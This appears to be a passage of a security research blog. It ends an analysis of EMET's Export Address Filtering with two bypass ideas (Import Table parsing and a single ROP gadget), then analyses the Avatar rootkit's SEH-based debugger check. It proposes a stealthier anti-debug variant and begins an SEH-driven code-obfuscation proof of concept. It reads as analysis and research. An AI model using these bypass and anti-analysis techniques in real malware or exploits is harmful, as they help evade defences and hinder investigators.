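enum eaf_action eaf_decide(uint32_t dr6, bool use_shipped_mask,
                           bool eip_in_module, bool stop_on_exploit)
{
    bool hit = use_shipped_mask ? dr6_hit_as_shipped(dr6) : dr6_hit_intended(dr6);
    if (!hit)             return EAF_RESUME;     /* jz short not_handled          */
    if (eip_in_module)    return EAF_RESUME;     /* is_in_module != 0: not_handled */
    /* report_protection has logged the event; status_exploitaction decides */
    if (!stop_on_exploit) return EAF_AUDIT_ONLY; /* logged, then not_handled      */
    return EAF_TERMINATE;                        /* STATUS_STACK_BUFFER_OVERRUN   */
}

int main(void)
{
    uint32_t dr7 = eaf_dr7();
    printf("DR7 = 0x%08X\n", dr7);
    for (int n = 0; n < 2; n++)
        printf("  DR%d: local=%d rw=%u len=%u bytes\n", n,
               dr7_local_enabled(dr7, n), dr7_rw(dr7, n), dr7_len_bytes(dr7, n));

    /* Constructed DR6 of a plain TF single step: no Bn bit, BS set, reserved bits 1. */
    uint32_t tf_step = DR6_RESERVED | DR6_BS;
    printf("TF step -> shipped mask: %d, intended mask: %d\n",
           dr6_hit_as_shipped(tf_step), dr6_hit_intended(tf_step));
    return 0;
}
```

With the shipped mask the TF-step value passes the test and EMET goes on to the module check, which is exactly the wasted handling the post points out.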
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Our journey through the EAF implementation is now over, but I would like to discuss briefly a couple of methods to bypass it. As declared by Microsoft, EAF wasn't meant as a definitive protection against unwanted access to the APIs addresses, but more as an obstacle for existing shellcodes.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">One simple way to obtain such information, without any need to access the Export Table, is to use the Import Table instead. In particular, you can parse the Import Table of a DLL that is <i>importing</i> the desired API from kernel32.dll or ntdll.dll and look for the OriginalFirstThunk and FirstThunk fields in the IMAGE_IMPORT_DESCRIPTOR structure. For example, User32.dll is loaded in almost every running process, and it imports both the LoadLibrary and GetProcAddress APIs, which are commonly used in shellcodes to get the addresses of other APIs.</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Another method to bypass EAF is to use a specially crafted <a href="http://cseweb.ucsd.edu/~hovav/dist/rop.pdf">ROP</a> gadget just to retrieve the AddressOfFunctions value. In this way, since you are reading the Export Table from a gadget that lies within an executable module, EMET won't detect anything suspicious and you can then find the addresses of all the needed APIs. Of course, EMET performs some security checks against ROP too, but since we need only one gadget it's not too difficult to find one that exploits the protection itself (or else, you may want to use a <a href="http://www.comp.nus.edu/~liangzk/papers/asiaccs11.pdf">JOP</a> gadget). For example, a shellcode may parse the Export Table of a module in order to find the pointer to the AddressOfFunctions field, put this pointer in the EAX register and then call a code gadget that does the following:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">MOV EAX, [EAX]</span><br />
<span style="font-family: Courier New, Courier, monospace;">RET</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">This gadget is very short (only three opcode bytes, 8B 00 C3), so it should be very easy to find inside most executable modules.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">These are just two simple ideas that came to mind; of course they are nothing new, and you can surely find other ways to implement the trick. Moreover, both methods assume that you have already got rid of DEP and ASLR, which are the real pain when writing an exploit.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><u>Note</u>: the analysis was originally written in September 2013 for version 4.0, but it still holds for current version 4.1.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com2tag:blogger.com,1999:blog-8573685359056491736.post-8855068274891109882013-06-10T02:32:00.000-07:002013-06-10T02:32:35.203-07:00
SEH: Subtle Exception Handling!
<span style="font-family: Verdana, sans-serif;">Malware is a never-ending source of obfuscation tricks: some are accurately crafted, whereas others just happen to be there. Sometimes it depends on the compiler itself: how it deals with optimizations, how it translates some language-specific constructs, and so on. In this case, we are going to discuss how SEH is implemented in Visual C++. After a short low-level explanation, I will propose a procedure that exploits this mechanism in order to obfuscate code, and I will provide the source code of a working POC too.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>SEH in Visual Studio: how does it work?</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Let's begin with a brief description of a little trick that I've found while analyzing a malware detected by ESET as Win32/Rootkit.Avatar</span><span style="font-family: Verdana, sans-serif;">. For more information about it you can check <a href="http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/">this detailed article</a>.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In particular, the article mentions a specific behaviour of the malware: "the malware </span><span style="font-family: Verdana, sans-serif;">raises an exception to pass control to an installed exception-handler". That is:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040235B push offset sub_402B26</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00402360 mov eax, large fs:0</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00402366 push eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00402367 mov large fs:0, esp</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the standard way an exception handler is installed, and it corresponds to a try-catch statement in C++.</span><br />
<span style="font-family: Verdana, sans-serif;">Anyway, if we keep analyzing the code we'll notice that this isn't the only exception handler being installed. In fact, we are going to see how the malware takes advantage of another one, in the attempt to hide a common debugger check (the PEB one) inside it.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Exception handlers have already been extensively documented in the past, but this one is a little bit trickier because it makes use of a Visual Studio specific implementation: the <a href="http://msdn.microsoft.com/en-us/library/s58ftw19(v=vs.80).aspx">try-except statement</a>. Here is how it is implemented in the malware:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CC5 push offset dword_4044C8</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">.text:00401CCA push offset __except_handler3</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CCF mov eax, large fs:0</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CD5 push eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401CD6 mov large fs:0, esp</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the installation code for a SEH in Visual Studio, and there are two substantial differences with respect to the previous code: the first is that it seems to install a standard library routine ("</span><span style="font-family: 'Courier New', Courier, monospace;">__except_handler3</span><span style="font-family: Verdana, sans-serif;">") as an exception handler, which doesn't look suspicious; the second is a little bit confusing if you haven't read the specifications before. </span><br />
<span style="font-family: Verdana, sans-serif;">However, a closer look will reveal the trick. In fact another value is being pushed, that is:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CC5 push offset dword_4044C8</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">We usually wouldn't expect to see this additional "push", and we would think that it isn't related to the SEH, but... it actually is!</span></div>
<div>
<span style="font-family: Verdana, sans-serif;">In particular, this "push" is putting on the stack the address of a data structure named "scopetable entry", <a href="http://www.microsoft.com/msj/0197/exception/exception.aspx">documented by Matt Pietrek</a>, which has the following definition:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> typedef struct _SCOPETABLE</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> DWORD previousTryLevel;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> DWORD lpfnFilter;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> DWORD lpfnHandler;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> } SCOPETABLE, *PSCOPETABLE;</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">It specifies the addresses of the code blocks to be executed for the filter expression ("lpfnFilter") and for the except body ("lpfnHandler"):</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__try {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ... code</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__except(<span style="color: blue;">filter expression</span>) {</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ... <span style="color: purple;">except body</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">The library routine "__except_handler3" uses this information first to call the code for the filter expression, which will decide if the exception is handled or not, and then to dispatch execution to the except body (in case it's handled). So, actually, the real exception handler installed by the malware is not the library one, but the one inside the except body. We can see this structure in the malware:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.rdata:004044C8 dword_4044C8 dd 0FFFFFFFFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.rdata:004044CC dd offset filter</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.rdata:004044D0 dd offset except_body</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">and the related code:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFA mov [ecx], al ; <span style="color: purple;"><span style="background-color: white;">trigger</span> exception!</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFC jmp short loc_401D13</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE ; ----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE filter:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401CFE mov eax, 1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D03 retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04 ; ----------------------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04 except_body:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D04 mov esp, [ebp+var_18]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D07 mov eax, large fs:30h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D0D mov al, [eax+2]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D10 mov [ebp+var_1C], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D13</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D13 loc_401D13:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D13 mov [ebp+var_4], 0FFFFFFFFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D1A mov al, byte ptr [ebp+var_1C]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D1D mov ecx, [ebp+var_10]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D20 mov large fs:0, ecx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D27 pop edi</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D28 pop esi</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D29 pop ebx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D2A mov esp, ebp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D2C pop ebp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401D2D retn</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">From this listing you can see that the filter code always returns true, which means that the except body is always executed when an exception happens (and the code triggers one on purpose at address 00401CFA). On execution, the except body checks PEB.BeingDebugged in order to detect a debugger attached to the process, and returns true or false depending on the result. Later, the function that called the above code will check that flag and terminate execution if a debugger was detected.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>A better way to exploit the SEH implementation.</u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">So, all this trouble just to hide the debugger check inside a try-except statement and make it a bit harder to trace; but, as it is, this trick is not really effective. Is it possible to do better?</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Well, if we put the debugger check inside the filter code rather than in the except body, we can make the filter return false in case of debugger detection, which means the library handler "__except_handler3" won't call the except body, and execution will terminate instead. This would confuse things, because the decision on whether to terminate execution or not is taken inside a library routine rather than in the malware code itself. In this case, anyone debugging the malware will find that execution always terminates while running the standard Visual Studio exception handler code, and will have to dig into it to understand what's happening.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">It would look like this:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__try</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> //...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> RaiseException(0, 0, 0, 0);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">__except(!IsDebuggerPresent())</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> //...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Briefly: the code guarded in the try block will cause an exception; the filter routine is the check implemented via the IsDebuggerPresent API, which returns true if the debugger is attached and false otherwise. So, in case a debugger is detected, the filter returns zero, and the except block is never called, causing the process to simply crash.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOpHlXLURzdELlsg4sS9l5aUz34X4CMHj9C3JuYUUhR1Kb3IrDpdWCZbOUqrfe0KJfWnpgz-W3mZzzq_N6RGvMnMPl80IIoYIWtjLdb53izSPXQw9zn-GMKSZK4wCgGoXj0SZNpZkXIjw/s1600/schema.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOpHlXLURzdELlsg4sS9l5aUz34X4CMHj9C3JuYUUhR1Kb3IrDpdWCZbOUqrfe0KJfWnpgz-W3mZzzq_N6RGvMnMPl80IIoYIWtjLdb53izSPXQw9zn-GMKSZK4wCgGoXj0SZNpZkXIjw/s1600/schema.jpg" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
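<div>
<span style="font-family: Verdana, sans-serif;">As an added illustration (my own model, not code from the malware, the post, or the Visual C++ runtime), the following plain C simulates the dispatch that "__except_handler3" performs over a SCOPETABLE, so the two layouts discussed above, the Avatar one with the PEB check in the except body and the proposed one with the check in the filter, can be compared without an MSVC toolchain; it also goes one step further than the post and chains two try levels through previousTryLevel. The filter and body functions, the ctx struct and the flag standing in for PEB.BeingDebugged are assumptions of the model.</span></div>

```c
/*
 * Added example, not code from the malware, the post or the Visual C++
 * runtime: a host-independent model of how __except_handler3 walks the
 * SCOPETABLE described in the post. Filter return values use the documented
 * SEH constants; nested __try blocks are chained through previousTryLevel as
 * in Pietrek's description. The ctx struct and the debugger flag standing in
 * for PEB.BeingDebugged are assumptions of this model.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define EXCEPTION_EXECUTE_HANDLER  1           /* filter: run the except body    */
#define EXCEPTION_CONTINUE_SEARCH  0           /* filter: pass to outer handlers */
#define TRYLEVEL_NONE              0xFFFFFFFFu /* the 0FFFFFFFFh in .rdata       */

typedef int  (*filter_fn)(void *);
typedef void (*handler_fn)(void *);

typedef struct _SCOPETABLE {
    uint32_t   previousTryLevel;  /* index of the enclosing __try, or -1 */
    filter_fn  lpfnFilter;        /* filter expression code block        */
    handler_fn lpfnHandler;       /* except body code block              */
} SCOPETABLE, *PSCOPETABLE;

enum seh_outcome { SEH_HANDLED, SEH_UNHANDLED };

/* Model of __except_handler3's dispatch: starting at the current try level,
 * call each filter; the first one returning EXECUTE_HANDLER gets its except
 * body run (after unwinding, in the real runtime); otherwise follow
 * previousTryLevel until the chain ends, which leaves the exception unhandled. */
enum seh_outcome dispatch(const SCOPETABLE *table, uint32_t trylevel,
                          void *ctx, int *handled_level)
{
    while (trylevel != TRYLEVEL_NONE) {
        if (table[trylevel].lpfnFilter(ctx) == EXCEPTION_EXECUTE_HANDLER) {
            table[trylevel].lpfnHandler(ctx);
            *handled_level = (int)trylevel;
            return SEH_HANDLED;
        }
        trylevel = table[trylevel].previousTryLevel;
    }
    *handled_level = -1;
    return SEH_UNHANDLED;
}

/* Shared state of the simulated code blocks. */
struct ctx {
    bool debugger_present;   /* stands in for PEB.BeingDebugged */
    int  result;             /* stands in for [ebp+var_1C]       */
};

/* Layout 1, as in the Avatar sample: the filter always returns 1
 * (mov eax, 1; retn) and the except body performs the PEB check. */
static int  avatar_filter(void *p) { (void)p; return EXCEPTION_EXECUTE_HANDLER; }
static void avatar_body(void *p)   { struct ctx *c = p; c->result = c->debugger_present; }

/* Layout 2, the post's proposal: the check moves into the filter, which
 * returns 0 under a debugger, so no except body is ever reached. */
static int  proposed_filter(void *p) { return !((struct ctx *)p)->debugger_present; }
static void proposed_body(void *p)   { ((struct ctx *)p)->result = 0; }

/* Beyond the post: a second, inner try level whose filter declines. */
static int  decline_filter(void *p) { (void)p; return EXCEPTION_CONTINUE_SEARCH; }

static const SCOPETABLE avatar_table[]   = { { TRYLEVEL_NONE, avatar_filter,   avatar_body } };
static const SCOPETABLE proposed_table[] = { { TRYLEVEL_NONE, proposed_filter, proposed_body } };
static const SCOPETABLE nested_table[]   = {
    { TRYLEVEL_NONE, avatar_filter,  avatar_body },   /* level 0: outer __try */
    { 0,             decline_filter, avatar_body },   /* level 1: inner __try */
};

/* Layout 1: returns what the except body stored (1 = debugger seen). */
int run_avatar(bool debugger)
{
    struct ctx c = { debugger, -1 };
    int lvl;
    dispatch(avatar_table, 0, &c, &lvl);
    return c.result;
}

/* Layout 2: the interesting result is the runtime outcome, not a stored flag. */
enum seh_outcome run_proposed(bool debugger)
{
    struct ctx c = { debugger, -1 };
    int lvl;
    return dispatch(proposed_table, 0, &c, &lvl);
}

/* Nested case: raise at level 1, report which level finally handled it. */
int run_nested(void)
{
    struct ctx c = { false, -1 };
    int lvl;
    dispatch(nested_table, 1, &c, &lvl);
    return lvl;
}

int main(void)
{
    printf("Avatar layout:   no debugger -> %d, debugger -> %d\n",
           run_avatar(false), run_avatar(true));
    printf("Proposed layout: no debugger -> %s, debugger -> %s\n",
           run_proposed(false) == SEH_HANDLED ? "handled" : "unhandled (crash)",
           run_proposed(true)  == SEH_HANDLED ? "handled" : "unhandled (crash)");
    printf("Nested layout:   handled by level %d\n", run_nested());
    return 0;
}
```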
<div>
<span style="font-family: Verdana, sans-serif;">Of course, you can obfuscate the code in the filter routine to make it less obvious, and this will leave the analyst puzzling over why the code is crashing inside a Visual Studio standard library routine :).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>"__except_handler4"?!</u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">"__except_handler3" is the standard library code, but it was susceptible to corruption in case of stack overflow, and this <a href="http://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/">caused security problems</a>. So with new versions of Visual Studio, the function was updated to "__except_handler4", which is essentially the same routine with additional features. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In particular, it uses canaries to protect the SEH data, in order to make sure that the pointers to the exception handlers have not been overwritten: </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:004010C5 @__security_check_cookie@4 proc near ; DATA XREF: __except_handler4+11 o</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010C5 cmp ecx, ___security_cookie</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CB jnz short loc_4010CF</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CD rep retn</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">.text:004010CF</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CF loc_4010CF: ; CODE XREF: __security_check_cookie(x)+6 j</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CF jmp ___report_gsfailure</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004010CF @__security_check_cookie@4 endp</span><br />
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<br />
<span style="font-family: Verdana, sans-serif;">Furthermore, the old "__except_handler3" was library code that was linked and embedded in the user executable, while "__except_handler4" is only a small wrapper for the API "_except_handler4_common", exported by the Visual Studio runtime dll (module msvcr*.dll):</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401799 mov edi, edi</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040179B push ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040179C mov ebp, esp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040179E push [ebp+arg_C]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017A1 push [ebp+arg_8]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017A4 push [ebp+arg_4]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017A7 push [ebp+arg_0]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017AA push offset @__security_check_cookie@4 ; __security_check_cookie(x)</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017AF push offset ___security_cookie</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017B4 call _except_handler4_common</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017B9 add esp, 18h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017BC pop ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004017BD retn</span><br />
<div>
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span>
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span></div>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Obfuscating algorithms.</u></span></div>
<div>
<br />
<span style="font-family: Verdana, sans-serif;">Now that we know all the details related to the SEH implementation in Visual Studio, I would like to propose a simple yet powerful idea to obfuscate algorithms.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Briefly, you can:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">Create a set of basic virtualized opcodes, each one implemented by a different function.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Use these opcodes to write the algorithm, encoding it in a data structure (each opcode is associated with a particular "id number").</span></li>
<li><span style="font-family: Verdana, sans-serif;">Execute each instruction of the program through a different filter expression. This means that if your algorithm consists of "n" opcodes, you will have "n" try-except blocks (that is, "n" filter expressions) and you will have to raise "n" exceptions as well.</span></li>
</ul>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8I9gdipxzGb51icVFSr-ws3h96-uxNBRY4pbZeERWKwl5Am61A0GMFGmzC7BdHVdDpM5nhoAEkpAbUmQ8ig68aukO4FoGLtpyD5aJB1j6eFQIbZSt9IiN80yvywm_VcUU6rVx9VWdes/s1600/imm1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS8I9gdipxzGb51icVFSr-ws3h96-uxNBRY4pbZeERWKwl5Am61A0GMFGmzC7BdHVdDpM5nhoAEkpAbUmQ8ig68aukO4FoGLtpyD5aJB1j6eFQIbZSt9IiN80yvywm_VcUU6rVx9VWdes/s1600/imm1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Here is the source code of a working POC that implements the RC4 algorithm:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter">// Build as a 32-bit C++ project with MSVC: __try/__except is MSVC SEH and the
// opcode tables store pointers as DWORDs.
#include <windows.h>
#include <stdio.h>

// globals used to keep the jl flags and the ip
int flags, eip;

// opcodes
#define OPC_MOD 0x11
#define OPC_XOR 0x12
#define OPC_CMP 0x13
#define OPC_JL  0x14
#define OPC_JMP 0x15
#define OPC_HLT 0x16
#define OPC_MOV 0x17
#define OPC_ADD 0x18

// operand types
#define OP_V 1 // variable
#define OP_C 2 // constant
#define OP_P 3 // pointer

// sizes
#define OP_BYTE  1
#define OP_DWORD 2

// opcode characterization
typedef struct _OPCODE
{
    BYTE opcode;
    BYTE type_op1;
    BYTE type_op2;
    BYTE size;
} OPCODE;

// macro to fill the opcode arrays quickly
#define MAKE_OPC(__opc, __op1, __op2, __size, __param1, __param2) \
    (__opc | (__op1 << 8) | (__op2 << 16) | (__size << 24)), \
    (DWORD)__param1, \
    (DWORD)__param2

// EXC_RUN to execute the opcode arrays "rc4_init_op" and "rc4_crypt_op"
#define EXC_RUN(__myprogram) \
    eip = 0; flags = 0; \
    while(eip != EIP_HALT){ EXC_TRY() EXC_EXCEPTION(__myprogram) EXC_USED_OPCODES() eip += 3; }

#define EIP_HALT 0xFFFFFFFF

// one nested __try per opcode routine
#define EXC_TRY() \
    __try{ __try{ __try{ __try{ __try{ __try{ __try{ __try{

// the exception code is the packed opcode, the two arguments are its operands
#define EXC_EXCEPTION(__program) RaiseException(__program[eip], 0, 2, (ULONG_PTR*)(&__program[eip+1]));

// every filter expression is one opcode routine: it handles the exception only
// when the packed opcode matches
#define EXC_INSTR(__opc) }__except(__opc(GetExceptionCode(), GetExceptionInformation())){}

#define EXC_USED_OPCODES() \
    EXC_INSTR(cmp) EXC_INSTR(mov) EXC_INSTR(add) EXC_INSTR(hlt) \
    EXC_INSTR(jmp) EXC_INSTR(jl) EXC_INSTR(mod) EXC_INSTR(xor)

// flags values after cmp
#define GT 0
#define LT 1
#define EQ 2

// checks the opcode and extracts its operands
